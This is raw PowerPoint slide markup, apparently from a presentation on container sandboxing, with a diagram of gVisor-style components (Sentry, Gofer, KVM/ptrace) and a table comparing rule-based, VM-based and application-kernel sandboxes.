            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/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622A0FAD-D2B5-9F4D-BA2F-DBFF27207940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9188329" y="5228880"/>
            <a:ext cx="893431" cy="811461"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAD0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Gofer</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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D31CCE46-E932-0147-B0DD-EA314F360487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6422617" y="4827727"/>
            <a:ext cx="2628704" cy="126946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764A873D-3609-1D4F-96FF-30B55D35F2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6749109" y="5241154"/>
            <a:ext cx="1067030" cy="466449"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D7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container</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1200" dirty="0"/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58BD5C9-5875-E744-9B49-FEC554CC7187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6884731" y="5359998"/>
            <a:ext cx="1067030" cy="466449"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D7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container</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1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E5DA150-0EC0-6A47-81C3-E269A008BE2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6533603" y="4846296"/>
            <a:ext cx="1418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Pod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="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D80B107-629D-FA4B-B7BB-F080397CFA5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8099154" y="5359998"/>
            <a:ext cx="884643" cy="413551"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAD0BF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Sentry</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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D39A6F3D-2E50-8B47-85D2-506730846D1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424438" y="6049432"/>
            <a:ext cx="1431512" cy="445416"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2DA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KVM/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptrace</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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2B6BFD70-1578-8846-9397-A11B5BDF4EF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9045033" y="6046370"/>
            <a:ext cx="1071860" cy="461730"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2DA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File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Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5090E6-9D16-974F-8091-F20A44734B3B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OCI</a:t>
            </a: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8185594-AEF1-F848-869E-E370B3F7F56B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7861179" y="6043512"/>
            <a:ext cx="1191963" cy="461730"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2DA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Limited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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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00F70D1-8CA8-7F4D-B39A-B16C3AC8BAB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7214511" y="5826447"/>
            <a:ext cx="133047" cy="217065"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="3D718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444CA0E-2B3A-C64E-971F-ED6B1CEDD1DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7604122" y="5773549"/>
            <a:ext cx="667934" cy="269963"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="3D718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64195B4-FEE0-5D4A-8DE0-C5F528EA9CCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8670422" y="5773549"/>
            <a:ext cx="0" cy="269963"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="3D718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1CB5976-34A6-5942-871F-0A9F1C16B666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994288" y="5621358"/>
            <a:ext cx="214068" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="3D718E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C3F4BFFC-A3ED-5F48-88AF-1B1A3186D5F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="56" idx="3"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8475561" y="3609580"/>
            <a:ext cx="393490" cy="128271"/>
          </a:xfrm>
          <a:prstGeom prst="line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7BBC8FF-D21E-744F-BA24-AC4158EBF13F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="56" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8475561" y="3609580"/>
            <a:ext cx="257868" cy="9427"/>
          </a:xfrm>
          <a:prstGeom prst="line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EB778241-BEAD-8F40-8D48-524B80A01FAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10315978" y="1213644"/>
            <a:ext cx="429200" cy="5514861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:prstDash val="lg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HO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>T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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>R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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>L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069875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8A53C9A7-4ABA-8E42-A850-31D3C21D5B67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31B5AA9-47D9-0C45-A599-4ACFA1FE29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254617"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1236727" y="2026359"/>
          <a:ext cx="9884355" cy="3758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4785">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3466098216"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2142420">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1924378729"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4447150">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2844097669"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="556026">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-CN" sz="2400" dirty="0"/>
                        <a:t>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400" dirty="0"/>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                        <a:t>ypical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CN" sz="2400" dirty="0"/>
                        <a:t>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Bullet Point</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-C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280254"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="978558">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>Rule-based Sandbox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2400"/>
                        <a:t>RunC</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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Need</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                        <a:t>s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to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work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with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 err="1"/>
                        <a:t>SELinux</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                        <a:t>,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sz="2400" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                        <a:t>AppArmor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                        <a:t>S</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
                        <a:t>eccomp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                        <a:t>,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cgroup</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-C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966206"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="978558">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>VM-based Sandbox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2400" dirty="0"/>
                        <a:t>Kata-container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BareMetal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Only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Heavy control logic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469052"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="978558">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>Application kernel based Sandbox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2400" dirty="0"/>
                        <a:t>gVisor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sz="2400" dirty="0"/>
                        <a:t>Compatibility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problem,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Bottleneck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in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sentry</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-C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451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8432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858CEB7-70E6-9B41-A172-B529C5DFA7EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8935147" y="2808371"/>
            <a:ext cx="2665771" cy="3249936"/>
            <a:chOff x="7844330" y="1865765"/>
            <a:chExt cx="3718306" cy="4535144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11D6BEA2-9874-C549-BAB3-6C4BEBF8E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15427" y="3953700"/>
              <a:ext cx="2447209" cy="2447209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C40E25D-0810-FB4A-8B8C-DC74850DA7EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7844330" y="1865765"/>
              <a:ext cx="3064737" cy="4513802"/>
              <a:chOff x="7844330" y="1865765"/>
              <a:chExt cx="3064737" cy="4513802"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Freeform 1291">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D1F5ADD-AFB0-784A-8A0C-647428C228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90713" y="3750210"/>
                <a:ext cx="102442" cy="110979"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 12"/>
                  <a:gd name="T1" fmla="*/ 12 h 13"/>
                  <a:gd name="T2" fmla="*/ 9 w 12"/>
                  <a:gd name="T3" fmla="*/ 13 h 13"/>
                  <a:gd name="T4" fmla="*/ 11 w 12"/>
                  <a:gd name="T5" fmla="*/ 11 h 13"/>
                  <a:gd name="T6" fmla="*/ 12 w 12"/>
                  <a:gd name="T7" fmla="*/ 3 h 13"/>
                  <a:gd name="T8" fmla="*/ 10 w 12"/>
                  <a:gd name="T9" fmla="*/ 1 h 13"/>
                  <a:gd name="T10" fmla="*/ 2 w 12"/>
                  <a:gd name="T11" fmla="*/ 0 h 13"/>
                  <a:gd name="T12" fmla="*/ 0 w 12"/>
                  <a:gd name="T13" fmla="*/ 2 h 13"/>
                  <a:gd name="T14" fmla="*/ 0 w 12"/>
                  <a:gd name="T15" fmla="*/ 10 h 13"/>
                  <a:gd name="T16" fmla="*/ 1 w 12"/>
                  <a:gd name="T17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3">
                    <a:moveTo>
                      <a:pt x="1" y="12"/>
                    </a:move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0" y="12"/>
                      <a:pt x="11" y="11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2"/>
                      <a:pt x="11" y="1"/>
                      <a:pt x="10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5" name="Freeform 1292">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70B3434-9DDD-A54B-A11B-7144034B27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39492" y="3903874"/>
                <a:ext cx="213422" cy="1007351"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 25"/>
                  <a:gd name="T1" fmla="*/ 1 h 118"/>
                  <a:gd name="T2" fmla="*/ 14 w 25"/>
                  <a:gd name="T3" fmla="*/ 1 h 118"/>
                  <a:gd name="T4" fmla="*/ 7 w 25"/>
                  <a:gd name="T5" fmla="*/ 0 h 118"/>
                  <a:gd name="T6" fmla="*/ 7 w 25"/>
                  <a:gd name="T7" fmla="*/ 0 h 118"/>
                  <a:gd name="T8" fmla="*/ 1 w 25"/>
                  <a:gd name="T9" fmla="*/ 107 h 118"/>
                  <a:gd name="T10" fmla="*/ 12 w 25"/>
                  <a:gd name="T11" fmla="*/ 118 h 118"/>
                  <a:gd name="T12" fmla="*/ 23 w 25"/>
                  <a:gd name="T13" fmla="*/ 107 h 118"/>
                  <a:gd name="T14" fmla="*/ 15 w 25"/>
                  <a:gd name="T15" fmla="*/ 1 h 118"/>
                  <a:gd name="T16" fmla="*/ 15 w 25"/>
                  <a:gd name="T17" fmla="*/ 1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118">
                    <a:moveTo>
                      <a:pt x="15" y="1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32"/>
                      <a:pt x="8" y="61"/>
                      <a:pt x="1" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="111"/>
                      <a:pt x="10" y="118"/>
                      <a:pt x="12" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="118"/>
                      <a:pt x="22" y="111"/>
                      <a:pt x="23" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="55"/>
                      <a:pt x="16" y="35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6" name="Freeform 1293">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265FF9D1-C36C-B24B-A9E7-CC0FA8455E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11439" y="3588010"/>
                <a:ext cx="136590" cy="221959"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 16"/>
                  <a:gd name="T1" fmla="*/ 4 h 26"/>
                  <a:gd name="T2" fmla="*/ 0 w 16"/>
                  <a:gd name="T3" fmla="*/ 9 h 26"/>
                  <a:gd name="T4" fmla="*/ 15 w 16"/>
                  <a:gd name="T5" fmla="*/ 26 h 26"/>
                  <a:gd name="T6" fmla="*/ 15 w 16"/>
                  <a:gd name="T7" fmla="*/ 21 h 26"/>
                  <a:gd name="T8" fmla="*/ 15 w 16"/>
                  <a:gd name="T9" fmla="*/ 21 h 26"/>
                  <a:gd name="T10" fmla="*/ 16 w 16"/>
                  <a:gd name="T11" fmla="*/ 17 h 26"/>
                  <a:gd name="T12" fmla="*/ 6 w 16"/>
                  <a:gd name="T13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26">
                    <a:moveTo>
                      <a:pt x="6" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="0"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="0" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="5" y="21"/>
                      <a:pt x="15" y="26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19"/>
                      <a:pt x="16" y="18"/>
                      <a:pt x="16" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="13"/>
                      <a:pt x="6" y="8"/>
                      <a:pt x="6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7" name="Freeform 1294">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69916844-C323-8B4F-9787-4EA1185B76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27303" y="3681915"/>
                <a:ext cx="196348" cy="170737"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 23"/>
                  <a:gd name="T1" fmla="*/ 3 h 20"/>
                  <a:gd name="T2" fmla="*/ 2 w 23"/>
                  <a:gd name="T3" fmla="*/ 11 h 20"/>
                  <a:gd name="T4" fmla="*/ 2 w 23"/>
                  <a:gd name="T5" fmla="*/ 12 h 20"/>
                  <a:gd name="T6" fmla="*/ 2 w 23"/>
                  <a:gd name="T7" fmla="*/ 12 h 20"/>
                  <a:gd name="T8" fmla="*/ 0 w 23"/>
                  <a:gd name="T9" fmla="*/ 20 h 20"/>
                  <a:gd name="T10" fmla="*/ 21 w 23"/>
                  <a:gd name="T11" fmla="*/ 10 h 20"/>
                  <a:gd name="T12" fmla="*/ 18 w 23"/>
                  <a:gd name="T13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20">
                    <a:moveTo>
                      <a:pt x="18" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="7"/>
                      <a:pt x="10" y="10"/>
                      <a:pt x="2" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="11"/>
                      <a:pt x="2" y="11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11" y="19"/>
                      <a:pt x="19" y="13"/>
                      <a:pt x="21" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="6"/>
                      <a:pt x="20" y="0"/>
                      <a:pt x="18" y="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8" name="Freeform 1295">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7A6888-E9E3-3D4E-919D-995CC83636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44330" y="3613620"/>
                <a:ext cx="1340289" cy="2765947"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 153 w 157"/>
                  <a:gd name="T1" fmla="*/ 177 h 324"/>
                  <a:gd name="T2" fmla="*/ 153 w 157"/>
                  <a:gd name="T3" fmla="*/ 171 h 324"/>
                  <a:gd name="T4" fmla="*/ 153 w 157"/>
                  <a:gd name="T5" fmla="*/ 170 h 324"/>
                  <a:gd name="T6" fmla="*/ 154 w 157"/>
                  <a:gd name="T7" fmla="*/ 163 h 324"/>
                  <a:gd name="T8" fmla="*/ 152 w 157"/>
                  <a:gd name="T9" fmla="*/ 158 h 324"/>
                  <a:gd name="T10" fmla="*/ 150 w 157"/>
                  <a:gd name="T11" fmla="*/ 158 h 324"/>
                  <a:gd name="T12" fmla="*/ 149 w 157"/>
                  <a:gd name="T13" fmla="*/ 158 h 324"/>
                  <a:gd name="T14" fmla="*/ 148 w 157"/>
                  <a:gd name="T15" fmla="*/ 157 h 324"/>
                  <a:gd name="T16" fmla="*/ 146 w 157"/>
                  <a:gd name="T17" fmla="*/ 156 h 324"/>
                  <a:gd name="T18" fmla="*/ 143 w 157"/>
                  <a:gd name="T19" fmla="*/ 154 h 324"/>
                  <a:gd name="T20" fmla="*/ 141 w 157"/>
                  <a:gd name="T21" fmla="*/ 153 h 324"/>
                  <a:gd name="T22" fmla="*/ 135 w 157"/>
                  <a:gd name="T23" fmla="*/ 140 h 324"/>
                  <a:gd name="T24" fmla="*/ 141 w 157"/>
                  <a:gd name="T25" fmla="*/ 31 h 324"/>
                  <a:gd name="T26" fmla="*/ 119 w 157"/>
                  <a:gd name="T27" fmla="*/ 7 h 324"/>
                  <a:gd name="T28" fmla="*/ 18 w 157"/>
                  <a:gd name="T29" fmla="*/ 24 h 324"/>
                  <a:gd name="T30" fmla="*/ 33 w 157"/>
                  <a:gd name="T31" fmla="*/ 74 h 324"/>
                  <a:gd name="T32" fmla="*/ 67 w 157"/>
                  <a:gd name="T33" fmla="*/ 113 h 324"/>
                  <a:gd name="T34" fmla="*/ 71 w 157"/>
                  <a:gd name="T35" fmla="*/ 72 h 324"/>
                  <a:gd name="T36" fmla="*/ 86 w 157"/>
                  <a:gd name="T37" fmla="*/ 74 h 324"/>
                  <a:gd name="T38" fmla="*/ 51 w 157"/>
                  <a:gd name="T39" fmla="*/ 54 h 324"/>
                  <a:gd name="T40" fmla="*/ 84 w 157"/>
                  <a:gd name="T41" fmla="*/ 42 h 324"/>
                  <a:gd name="T42" fmla="*/ 91 w 157"/>
                  <a:gd name="T43" fmla="*/ 72 h 324"/>
                  <a:gd name="T44" fmla="*/ 88 w 157"/>
                  <a:gd name="T45" fmla="*/ 85 h 324"/>
                  <a:gd name="T46" fmla="*/ 77 w 157"/>
                  <a:gd name="T47" fmla="*/ 115 h 324"/>
                  <a:gd name="T48" fmla="*/ 58 w 157"/>
                  <a:gd name="T49" fmla="*/ 153 h 324"/>
                  <a:gd name="T50" fmla="*/ 91 w 157"/>
                  <a:gd name="T51" fmla="*/ 194 h 324"/>
                  <a:gd name="T52" fmla="*/ 135 w 157"/>
                  <a:gd name="T53" fmla="*/ 160 h 324"/>
                  <a:gd name="T54" fmla="*/ 133 w 157"/>
                  <a:gd name="T55" fmla="*/ 162 h 324"/>
                  <a:gd name="T56" fmla="*/ 132 w 157"/>
                  <a:gd name="T57" fmla="*/ 163 h 324"/>
                  <a:gd name="T58" fmla="*/ 131 w 157"/>
                  <a:gd name="T59" fmla="*/ 164 h 324"/>
                  <a:gd name="T60" fmla="*/ 92 w 157"/>
                  <a:gd name="T61" fmla="*/ 199 h 324"/>
                  <a:gd name="T62" fmla="*/ 87 w 157"/>
                  <a:gd name="T63" fmla="*/ 201 h 324"/>
                  <a:gd name="T64" fmla="*/ 82 w 157"/>
                  <a:gd name="T65" fmla="*/ 203 h 324"/>
                  <a:gd name="T66" fmla="*/ 78 w 157"/>
                  <a:gd name="T67" fmla="*/ 205 h 324"/>
                  <a:gd name="T68" fmla="*/ 74 w 157"/>
                  <a:gd name="T69" fmla="*/ 207 h 324"/>
                  <a:gd name="T70" fmla="*/ 63 w 157"/>
                  <a:gd name="T71" fmla="*/ 213 h 324"/>
                  <a:gd name="T72" fmla="*/ 34 w 157"/>
                  <a:gd name="T73" fmla="*/ 231 h 324"/>
                  <a:gd name="T74" fmla="*/ 19 w 157"/>
                  <a:gd name="T75" fmla="*/ 271 h 324"/>
                  <a:gd name="T76" fmla="*/ 60 w 157"/>
                  <a:gd name="T77" fmla="*/ 319 h 324"/>
                  <a:gd name="T78" fmla="*/ 63 w 157"/>
                  <a:gd name="T79" fmla="*/ 255 h 324"/>
                  <a:gd name="T80" fmla="*/ 112 w 157"/>
                  <a:gd name="T81" fmla="*/ 244 h 324"/>
                  <a:gd name="T82" fmla="*/ 115 w 157"/>
                  <a:gd name="T83" fmla="*/ 243 h 324"/>
                  <a:gd name="T84" fmla="*/ 118 w 157"/>
                  <a:gd name="T85" fmla="*/ 242 h 324"/>
                  <a:gd name="T86" fmla="*/ 122 w 157"/>
                  <a:gd name="T87" fmla="*/ 241 h 324"/>
                  <a:gd name="T88" fmla="*/ 153 w 157"/>
                  <a:gd name="T89" fmla="*/ 182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57" h="324">
                    <a:moveTo>
                      <a:pt x="153" y="182"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="180"/>
                      <a:pt x="153" y="179"/>
                      <a:pt x="153" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="176"/>
                      <a:pt x="153" y="176"/>
